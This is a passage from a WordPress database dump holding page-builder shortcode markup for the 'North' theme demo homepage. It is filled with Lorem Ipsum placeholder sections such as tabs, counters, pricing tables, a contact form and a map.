tabs=\"%5B%7B%22title%22%3A%22Movie%22%2C%22heading%22%3A%22Movie%22%2C%22text%22%3A%22Contrary%20to%20popular%20belief%2C%20Lorem%20Ipsum%20is%20not%20simply%20random%20text.%20It%20has%20roots%20in%20a%20piece%20of%20classical%20Latin%20literature%20from%2045%20BC%2C%20making%20it%20over%202000%20years%20old.%20Rich%20McClintock%20not%20simply.%20There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form.%22%7D%2C%7B%22title%22%3A%22Landing%22%2C%22heading%22%3A%22Landing%22%2C%22text%22%3A%22There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form%2C%20by%20injected%20humour%2C%20or%20randomised%20words%20which%20don%E2%80%99t%20look%20even%20snormally%20believable.%20If%20you%20are%20going%20to%20use%20a%20passage%20of%20Lorem%20Ipsum%2C%20you%20need%20to%20be%20sure%20there%20isn%E2%80%99t%20anything%20embarrassing%20hidden%20in%20the%20middle%20of%20text.%20All%20the%20Lorem%20Ipsum%20generators%20on%20the%20Internet%20tend%20to%20repeat%20predefined%20chunks%20as%20necessary%2C%20making%20this%20the%20first%20true%20generator%20on%20the%20Internet.%20It%20uses%20a%20dictionary%20of%20over%20200%20Latin%20words%2C%20combined%20with%20a%20handful%20of%20model%20sentence%20structures%2C%20to%20generate%20Lorem%20Ipsum%20which%20looks%20reasonable.%20The%20generated%20Lorem%20Ipsum%20is%20therefore%20always%20free%20from%20repetition%2C%20injected%20humour%2C%20or%20non-characteristic%20words%20etc.%22%7D%2C%7B%22title%22%3A%22Design%22%2C%22heading%22%3A%22Design%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%2C%7B%22title%22%3A%22Art%22%2C%22heading%22%3A%22Art%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%5D\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css_animation=\"left-to-right\"]\n<h1>PARALLAX WITH DEGRADE</h1>\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock not simply.\n\n[list icon=\"caret-right\" color=\"dark\" background=\"yes\"]\n\n[li]There are many variations of passages.<span style=\"color: #ffffff;\">.</span>[/li]\n\n[li]Contrary to popular belief, Lorem Ipsum is not simply random text.[/li]\n\n[li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.[/li]\n\n[li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.<span style=\"color: #ffffff;\">.</span>[/li]\n\n[li]But I must explain to you how all this mistaken idea<span style=\"color: #ffffff;\">.</span>[/li]\n\n[/list]\n\nSed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium dolorem que laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo.\n\n[button label=\"Read More\" url=\"#\" color=\"black\"][/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"601\" css_animation=\"right-to-left\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" alignment=\"right\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"facts\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"WHAT OUR FUN FACTORS\" color=\"dark\" animated=\"yes\" margin_bottom=\"0\"][vc_row_inner][vc_column_inner width=\"1/4\"][counter title=\"Days Worked\" number=\"640\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Projects Finished\" number=\"1250\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Coffee Cups\" number=\"2040\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Pizza Ordered\" number=\"1620\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1405454215519{padding-bottom: 50px !important;background-color: #202123 !important;border-color: #eeeeee !important;}\" el_id=\"works\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" color_scheme=\"white\"][vc_column width=\"1/1\"][special_heading title=\"Our Portfolio\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old.\"][portfolio_grid filter=\"yes\" style=\"default\" cols=\"5\" thumb_size=\"square\" paged_posts=\"no\" cats=\"branding,design,photography,video\" thumb_style=\"alt\" more_url=\"http://veented.com/themes/north/portfolio/\" fullwidth=\"no\" thumb_space=\"no\"][/vc_column][/vc_row][vc_row el_id=\"team\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Creative Team\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][team_carousel posts_nr=\"6\"][/vc_column][/vc_row][vc_row el_id=\"features\" css=\".vc_custom_1405099363182{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i21.jpg?id=537) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][special_heading title=\"Features With Mobile\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical. There are many variations of passages of Lorem Ipsum available.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406710045791{padding-top: 60px !important;}\"][icon_box title=\"Analystic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-camera-retro\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Web Design\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-cog\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}\"][vc_single_image image=\"606\" alignment=\"center\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" css=\".vc_custom_1405099308623{margin-bottom: -250px !important;}\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406710051477{padding-top: 60px !important;}\"][icon_box title=\"Wordpress\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Graphic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-paper-plane-o\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1406710059782{padding-top: 100px !important;padding-bottom: 100px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1408506362110{padding-top: 0px !important;background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}\" bg_overlay=\"dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][testimonials style=\"simple\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405452967628{padding-bottom: 70px !important;}\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"What Clients Says\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][testimonials style=\"expanded\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405454282439{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #1d1e20 !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][logos_carousel images=\"568,566,567,563,564,565\" onclick=\"custom_link\" custom_links=\"#,#,#,#,#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405452979786{margin-bottom: -15px !important;padding-bottom: 0px !important;}\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"WHY DO YOU CHOOSE NORTH?\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1409774002317{padding-bottom: 80px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" el_id=\"what-we\"][vc_column width=\"1/2\"][vc_tabs][vc_tab title=\"Design\" tab_id=\"1403954748-1-96f2de-a384c686-9309a875-582ad748-b8d0\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\"><img class=\"size-full wp-image-926 alignleft\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\" alt=\"mini-phone\" width=\"164\" height=\"116\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Company\" tab_id=\"1403954748-2-63f2de-a384c686-9309a875-582ad748-b8d0\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\"><img class=\"alignright size-full wp-image-927\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\" alt=\"mini-phone1\" width=\"130\" height=\"165\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Support\" tab_id=\"1405423831831-2-6c686-9309a875-582ad748-b8d0\"][vc_column_text]Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][/vc_tabs][/vc_column][vc_column width=\"1/2\"][vc_accordion][vc_accordion_tab title=\"Awesome Design\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Improved Documentation\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Clean Coded\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][/vc_accordion][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099662664{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i31.jpg?id=538) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" fullwidth=\"yes\" parallax=\"yes\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Featured Works\" color=\"dark\" animated=\"yes\" subtitle=\"CONTRARY TO POPULAR BELIEF, LOREM IPSUM IS NOT SIMPLY RANDOM TEXT. IT HAS ROOTS IN PIECE OF CLASSICAL. THERE ARE MANY VARIATIONS OF PASSAGES OF LOREM IPSUM AVAILABLE.\"][portfolio_carousel cats=\"branding,design,photography,video\" posts_nr=\"6\" thumb_style=\"alt\"][cta heading=\"super responsive, clean and creative theme\" subtitle=\"This is Photoshop\'s version of Lorem Ipsum. Proin gravida nibh vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum.\" button1_title=\"Our Portfolio\" button1_url=\"#works\" button2_title=\"Keep in Touch\" button2_url=\"#contact\" margin_bottom=\"0\" button1_subtitle=\"click for our all works\" button2_subtitle=\"send us a message\" style=\"centered\" button_color=\"white\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405452992592{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Skills\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"55|Design,85|Wordpress,75|HTML&amp;CSS\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"70|Photography,75|Web Design,80|Photoshop\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1405454247199{background-color: #202123 !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" el_id=\"services\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" customcolor_heading=\"#303030\" customcolor_text=\"#2d2d2d\" color_scheme=\"white\"][vc_column width=\"1/1\"][special_heading title=\"OUR SERVICES\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia.\"][services_carousel posts_nr=\"5\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099958560{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" darken=\"light\" bg_overlay=\"darker\" color_scheme=\"white\" el_id=\"prices\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Pricing Tables\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Starter\" price=\"$19\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"100\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Standard\" price=\"$39\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"300\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Professional\" price=\"$59\" period=\"per year\" featured=\"yes\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"500\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Platinum\" price=\"$79\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"700\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1405453013868{padding-bottom: 70px !important;background-color: #1b1b1b !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" color_scheme=\"white\"][vc_column width=\"1/1\"][special_heading title=\"Keep in Touch\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][vntd_contact_form email=\"prafgon@gmail.com\" label_name=\"Please enter your Name\" label_email=\"Please enter your E-Mail\" label_subject=\"Please enter your Subject\" label_message=\"Please enter your Message\" label_submit=\"Send E-Mail\" id=\"417\" animated=\"no\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405452676244{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i61.jpg?id=541) !important;}\" bg_overlay=\"darker\" el_id=\"contact\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][contact_block phone=\"0123 456 789\" address=\"NORTH, STREET NAME 6209, MELBOURNE AUSTRALIA\" email=\"SUPPORT@GOLDEYESTHEME.COM\" facebook=\"#\" twitter=\"#\" linkedin=\"#\" youtube=\"#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][gmap lat=\"41.862274\" long=\"-87.701328\" height=\"400\" zoom=\"15\" marker1_title=\"Office 1\" marker1_text=\"Your description goes here.\" marker1_location=\"custom\" marker1_location_custom=\"41.863774,-87.721328\" marker2_title=\"Our other store\" marker2_text=\"My secondary marker description.\" marker2_location=\"41.858774,-87.685328\"][/vc_column][/vc_row]','Home10','','publish','open','open','','home10','','','2020-10-28 13:47:38','2020-10-28 13:47:38','',0,'http://veented.com/themes/north/?page_id=745',0,'page','',0),(1925,1,'2014-07-15 19:42:33','2014-07-15 19:42:33','[vc_row css=\".vc_custom_1405453516277{padding-top: 0px !important;padding-bottom: 0px !important;}\" el_id=\"first\" fullwidth=\"yes\" row_width=\"fullwidth\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][vntd_fullscreen_slider images=\"542,543,544\" text_static=\"The goods you need now\" style=\"style2\" posts_nr=\"6\" bg_overlay=\"dark1\" button1_label=\"Read more\" button1_url=\"#about\" animated=\"no\" text_dynamic=\"WELCOME TO NORTH,We are Designers,We love to Design\"][/vc_column][/vc_row][vc_row el_id=\"about\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"About North\" color=\"dark\" animated=\"yes\" margin_bottom=\"65\"]About North[/special_heading][vc_row_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Professional Design\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"300\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Retina Ready\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-comments-o\" animated=\"yes\" animation_delay=\"500\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"7x24 Support\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-life-ring\" animated=\"yes\" animation_delay=\"700\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Clean Coding\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-flask\" animated=\"yes\" animation_delay=\"900\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"what-we-do\" css=\".vc_custom_1405099060231{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i11.jpg?id=536) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"What we do\" color=\"white\" animated=\"yes\" margin_bottom=\"0\"]About North[/special_heading][north_tabs tabs=\"%5B%7B%22title%22%3A%22Movie%22%2C%22heading%22%3A%22Movie%22%2C%22text%22%3A%22Contrary%20to%20popular%20belief%2C%20Lorem%20Ipsum%20is%20not%20simply%20random%20text.%20It%20has%20roots%20in%20a%20piece%20of%20classical%20Latin%20literature%20from%2045%20BC%2C%20making%20it%20over%202000%20years%20old.%20Rich%20McClintock%20not%20simply.%20There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form.%22%7D%2C%7B%22title%22%3A%22Landing%22%2C%22heading%22%3A%22Landing%22%2C%22text%22%3A%22There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form%2C%20by%20injected%20humour%2C%20or%20randomised%20words%20which%20don%E2%80%99t%20look%20even%20snormally%20believable.%20If%20you%20are%20going%20to%20use%20a%20passage%20of%20Lorem%20Ipsum%2C%20you%20need%20to%20be%20sure%20there%20isn%E2%80%99t%20anything%20embarrassing%20hidden%20in%20the%20middle%20of%20text.%20All%20the%20Lorem%20Ipsum%20generators%20on%20the%20Internet%20tend%20to%20repeat%20predefined%20chunks%20as%20necessary%2C%20making%20this%20the%20first%20true%20generator%20on%20the%20Internet.%20It%20uses%20a%20dictionary%20of%20over%20200%20Latin%20words%2C%20combined%20with%20a%20handful%20of%20model%20sentence%20structures%2C%20to%20generate%20Lorem%20Ipsum%20which%20looks%20reasonable.%20The%20generated%20Lorem%20Ipsum%20is%20therefore%20always%20free%20from%20repetition%2C%20injected%20humour%2C%20or%20non-characteristic%20words%20etc.%22%7D%2C%7B%22title%22%3A%22Design%22%2C%22heading%22%3A%22Design%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%2C%7B%22title%22%3A%22Art%22%2C%22heading%22%3A%22Art%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%5D\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css_animation=\"left-to-right\"]\n<h1>PARALLAX WITH DEGRADE</h1>\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock not simply.\n\n[list icon=\"caret-right\" color=\"dark\" background=\"yes\"]\n\n[li]There are many variations of passages.<span style=\"color: #ffffff;\">.</span>[/li]\n\n[li]Contrary to popular belief, Lorem Ipsum is not simply random text.[/li]\n\n[li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.[/li]\n\n[li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.<span style=\"color: #ffffff;\">.</span>[/li]\n\n[li]But I must explain to you how all this mistaken idea<span style=\"color: #ffffff;\">.</span>[/li]\n\n[/list]\n\nSed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium dolorem que laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo.\n\n[button label=\"Read More\" url=\"#\" color=\"black\"][/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"601\" css_animation=\"right-to-left\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" alignment=\"right\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"facts\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"WHAT OUR FUN FACTORS\" color=\"dark\" animated=\"yes\" margin_bottom=\"0\"][vc_row_inner][vc_column_inner width=\"1/4\"][counter title=\"Days Worked\" number=\"640\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Projects Finished\" number=\"1250\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Coffee Cups\" number=\"2040\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Pizza Ordered\" number=\"1620\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1405454215519{padding-bottom: 50px !important;background-color: #202123 !important;border-color: #eeeeee !important;}\" el_id=\"works\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" color_scheme=\"white\"][vc_column width=\"1/1\"][special_heading title=\"Our Portfolio\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old.\"][portfolio_grid filter=\"yes\" style=\"default\" cols=\"5\" thumb_size=\"square\" paged_posts=\"no\" cats=\"branding,design,photography,video\" thumb_style=\"alt\" more_url=\"http://veented.com/themes/north/portfolio/\" fullwidth=\"no\" thumb_space=\"no\"][/vc_column][/vc_row][vc_row el_id=\"team\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Creative Team\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][team_carousel posts_nr=\"6\"][/vc_column][/vc_row][vc_row el_id=\"features\" css=\".vc_custom_1405099363182{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i21.jpg?id=537) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][special_heading title=\"Features With Mobile\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical. There are many variations of passages of Lorem Ipsum available.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406710045791{padding-top: 60px !important;}\"][icon_box title=\"Analystic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" 